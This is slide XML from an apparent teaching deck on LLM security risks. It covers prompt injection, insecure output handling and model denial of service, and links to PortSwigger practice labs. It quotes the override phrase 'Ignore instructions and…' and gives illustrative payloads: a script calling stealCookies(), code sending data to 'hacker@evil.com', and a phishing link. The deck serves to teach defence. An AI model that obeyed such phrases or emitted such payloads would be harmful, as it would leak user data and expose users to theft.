          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1757457" y="2890009"/>
            <a:ext cx="1" cy="651400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F2D74B1C-4B82-C7CF-5431-03FFBA95B57E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="14" idx="3"/>
            <a:endCxn id="12" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2714623" y="4056023"/>
            <a:ext cx="828870" cy="0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9468460B-963B-E7FF-7422-D89DCF584694}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="12" idx="0"/>
            <a:endCxn id="11" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4500659" y="2894237"/>
            <a:ext cx="0" cy="647172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FEF2CB83-5F63-F07D-57A4-50796473EAFC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="3" idx="3"/>
            <a:endCxn id="11" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2714623" y="2379623"/>
            <a:ext cx="828870" cy="0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AEB50162-6856-F14D-5B5A-27A8E1D755A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2697689" y="2873075"/>
            <a:ext cx="892177" cy="725258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2" name="TextBox 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F11098A-871F-FFA7-E452-1B89A203EF1F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2844660" y="5469466"/>
            <a:ext cx="62667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chemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>enable</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1100" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill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715379DF-5D25-C5CD-27A6-ACC4178FC5F2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2805041" y="3780487"/>
            <a:ext cx="70591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chemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>enables</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1100" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1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5D29C2FB-3A36-E6AE-5F59-0287959C9A1F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="2321348">
            <a:off x="2833274" y="3005174"/>
            <a:ext cx="70591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>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>use</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1100" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1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E363AFFB-BDFF-F20E-95C2-2F7CA4EE2DF9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1231870" y="3084904"/>
            <a:ext cx="70591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>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>use</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1100" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill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D1D716D-0258-72A9-AF3E-17862F43DDD8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2728906" y="2153775"/>
            <a:ext cx="70591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>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>have</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1100" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill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FFDEFA15-BCC4-79A9-359A-5BAF16402F3E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4452182" y="3104899"/>
            <a:ext cx="93261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>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Accomplish</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="11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74747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1B35BD2-07C0-84CA-5D13-08CCF34EB8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black background with white dots">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C9FD79C0-BF0D-9A58-CC30-EFEBAC0D945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/>
                    </a14:imgEffect>
                    <a14:imgEffect>
                      <a14:colorTemperature colorTemp="308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18" t="1277"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-68972" y="-211014"/>
            <a:ext cx="12367652" cy="7178974"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:outerShdw dist="50800" dir="5400000" algn="ctr" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="43137"/>
              </a:srgbClr>
            </a:outerShdw>
            <a:reflection stA="45000" endPos="65000" dist="50800" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
            <a:softEdge rad="0"/>
          </a:effectLst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565F3935-CFE7-FDFD-8241-DE6BEAF1BB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169333"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US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Prompt Injection</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="4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C51893E2-422A-E093-FE63-4ECA703B5A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651000"/>
            <a:ext cx="10515599" cy="5037667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buClr>
                <a:schemeClr val="accent1">
                  <a:lumMod val="40000"/>
                  <a:lumOff val="6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🔍 What is it?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1">
                  <a:lumMod val="40000"/>
                  <a:lumOff val="60000"/>
                </a:schemeClr>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US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Sneaky commands that break AI rules.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="accent1">
                  <a:lumMod val="40000"/>
                  <a:lumOff val="6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⚠️ Why it matters:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1">
                  <a:lumMod val="40000"/>
                  <a:lumOff val="60000"/>
                </a:schemeClr>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US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Leaks data, spreads harm, bypasses safeguards.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="accent1">
                  <a:lumMod val="40000"/>
                  <a:lumOff val="6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🎯 How it works:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1">
                  <a:lumMod val="40000"/>
                  <a:lumOff val="60000"/>
                </a:schemeClr>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US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Hidden prompts like ‘Ignore instructions and…’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="accent1">
                  <a:lumMod val="40000"/>
                  <a:lumOff val="6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🌍 Real-world risk:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1">
                  <a:lumMod val="40000"/>
                  <a:lumOff val="60000"/>
                </a:schemeClr>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US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Chatbots, code assistants, content tools—all vulnerable.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1683714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ED7B96-2181-00E8-293D-8F07E4315F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black background with white dots">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA11987B-7AA6-67BC-6C6C-4F55E4F23B3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/>
                    </a14:imgEffect>
                    <a14:imgEffect>
                      <a14:colorTemperature colorTemp="308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18" t="1277"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-68972" y="-211014"/>
            <a:ext cx="12367652" cy="7178974"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:outerShdw dist="50800" dir="5400000" algn="ctr" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="43137"/>
              </a:srgbClr>
            </a:outerShdw>
            <a:reflection stA="45000" endPos="65000" dist="50800" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
            <a:softEdge rad="0"/>
          </a:effectLst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B83BB2E9-A060-1B56-4667-1B3DFE6EC5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169333"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US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Indirect Prompt Injection: Lab Access</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="4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95A34A69-5AB6-1D36-6D7C-8FA3197819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57054" y="3251336"/>
            <a:ext cx="11334946" cy="355327"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1">
                  <a:lumMod val="40000"/>
                  <a:lumOff val="60000"/>
                </a:schemeClr>
              </a:buClr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US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Click on this link to access the lab – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://portswigger.net/web-security/llm-attacks/lab-indirect-prompt-injection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="20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7387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EEA5BDF-EA5B-9BD3-B5C1-A65D0ED4EB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black background with white dots">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{90D97174-DD56-4381-BA06-C5804F241A0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/>
                    </a14:imgEffect>
                    <a14:imgEffect>
                      <a14:colorTemperature colorTemp="308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18" t="1277"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-87826" y="-239294"/>
            <a:ext cx="12367652" cy="7178974"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:outerShdw dist="50800" dir="5400000" algn="ctr" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="43137"/>
              </a:srgbClr>
            </a:outerShdw>
            <a:reflection stA="45000" endPos="65000" dist="50800" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
            <a:softEdge rad="0"/>
          </a:effectLst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C70E7DAA-9902-C7E4-ECAA-81053D886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169333"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US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Insecure Output Handling</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="4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199880F5-2F40-3BF0-7668-9F27FC22CB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57053" y="1494895"/>
            <a:ext cx="11441627" cy="5193771"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1">
                  <a:lumMod val="40000"/>
                  <a:lumOff val="60000"/>
                </a:schemeClr>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="20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💣 Hidden Threats in Plain Sight</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1">
                  <a:lumMod val="40000"/>
                  <a:lumOff val="60000"/>
                </a:schemeClr>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US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AI outputs can hide scripts, links, or malicious code."</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1">
                  <a:lumMod val="40000"/>
                  <a:lumOff val="60000"/>
                </a:schemeClr>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="20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🤖 Chatbot Example</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1">
                  <a:lumMod val="40000"/>
                  <a:lumOff val="60000"/>
                </a:schemeClr>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US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User asks for weather → AI responds with &lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err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stealCookies</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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().</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1">
                  <a:lumMod val="40000"/>
                  <a:lumOff val="60000"/>
                </a:schemeClr>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="20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👨💻 Code Generation Gone Wrong</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1">
                  <a:lumMod val="40000"/>
                  <a:lumOff val="60000"/>
                </a:schemeClr>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US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AI writes code → sneaks in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err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sendData</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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("hacker@evil.com").</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1">
                  <a:lumMod val="40000"/>
                  <a:lumOff val="60000"/>
                </a:schemeClr>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="20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📧 Phishing via AI-Generated Emails</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1">
                  <a:lumMod val="40000"/>
                  <a:lumOff val="60000"/>
                </a:schemeClr>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US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Newsletter draft → includes [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err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malicious.link</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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] → customers hacked.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1">
                  <a:lumMod val="40000"/>
                  <a:lumOff val="60000"/>
                </a:schemeClr>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="20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🚪 The Unlocked Door Analogy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1">
                  <a:lumMod val="40000"/>
                  <a:lumOff val="60000"/>
                </a:schemeClr>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US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Insecure outputs = leaving your front door wide open</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3253523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144072-250A-75D4-2814-C1D9D06878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black background with white dots">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{80F591BA-4C71-3A69-316E-65640195441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/>
                    </a14:imgEffect>
                    <a14:imgEffect>
                      <a14:colorTemperature colorTemp="308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18" t="1277"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-68972" y="-211014"/>
            <a:ext cx="12367652" cy="7178974"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:outerShdw dist="50800" dir="5400000" algn="ctr" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="43137"/>
              </a:srgbClr>
            </a:outerShdw>
            <a:reflection stA="45000" endPos="65000" dist="50800" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
            <a:softEdge rad="0"/>
          </a:effectLst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3067AD5D-5196-0FC6-E734-FA6F7205F4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169333"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US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Insecure Output Handling: Lab Access</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="4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962E973C-CA87-968A-249C-4D5B88CF90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57053" y="3251337"/>
            <a:ext cx="11441627" cy="355464"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1">
                  <a:lumMod val="40000"/>
                  <a:lumOff val="60000"/>
                </a:schemeClr>
              </a:buClr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US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Click on this link to access the lab – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://portswigger.net/web-security/llm-attacks/lab-exploiting-insecure-output-handling-in-llms</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="20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36158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9BBB291-1894-2F05-5B78-3078E89321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black background with white dots">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C9997BCA-E071-3714-94B2-E01BE9C028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/>
                    </a14:imgEffect>
                    <a14:imgEffect>
                      <a14:colorTemperature colorTemp="308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18" t="1277"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-68972" y="-187568"/>
            <a:ext cx="12382892" cy="7167488"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:outerShdw dist="50800" dir="5400000" algn="ctr" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="43137"/>
              </a:srgbClr>
            </a:outerShdw>
            <a:reflection stA="45000" endPos="65000" dist="50800" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
            <a:softEdge rad="0"/>
          </a:effectLst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7CCDB874-D13E-E121-3500-CB547A84BC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Model Denial of Service</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="4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B484FBB7-D26D-81E8-A3A7-35811D1BA4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625601"/>
            <a:ext cx="10832185" cy="4247298"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1">
                  <a:lumMod val="40000"/>
                  <a:lumOff val="60000"/>
                </a:schemeClr>
              </a:buClr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="20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>
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1">
                  <a:lumMod val="40000"/>
                  <a:lumOff val="6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Complex Computational Tasks: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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Attacks overload AI by repeatedly requiring it to perform resource-intensive calculations.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1">
                  <a:lumMod val="40000"/>
                  <a:lumOff val="6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Endless Data Retrieval Loops: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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AI is manipulated into a continuous cycle of processing, preventing conclusion and consuming resources indefinitely.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1">
                  <a:lumMod val="40000"/>
                  <a:lumOff val="6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Operational Impact: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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Such attacks degrade service quality and increase operational costs through excessive resource consumption.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1">
                  <a:lumMod val="40000"/>
                  <a:lumOff val="6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Security Implications: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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Highlighting the need for robust defensive strategies to protect AI systems from sophisticated disruptions.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3673984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B5B298-34DF-C03E-EB1D-DE103F1B03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black background with white dots">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{569DC18C-3439-5E5B-1916-5F897FAE141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/>
                    </a14:imgEffect>
                    <a14:imgEffect>
                      <a14:colorTemperature colorTemp="308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18" t="1277"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-68972" y="-187568"/>
            <a:ext cx="12382892" cy="7167488"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:outerShdw dist="50800" dir="5400000" algn="ctr" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="43137"/>
              </a:srgbClr>
            </a:outerShdw>
            <a:reflection stA="45000" endPos="65000" dist="50800" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
            <a:softEdge rad="0"/>
          </a:effectLst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D3C75DDF-368B-2509-ABBE-0F8F061C63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Model Denial of Service</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="4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7978D6F2-8431-9091-094A-C37B331B6D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625600"/>
            <a:ext cx="10832185" cy="4867275"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" dirty="0"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🚦 Rate Limiting &amp; Throttling</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8FAF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Block users sending 1,000 requests in 10 seconds.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" dirty="0"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🗑️ Input Validation &amp; Filtering</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8FAF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Toss oversized files and suspicious prompts.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" dirty="0"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🚀 Auto-Scaling &amp; Load Balancing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8FAF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Spin up extra servers during attacks.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" dirty="0"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⚡ Model Optimization</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
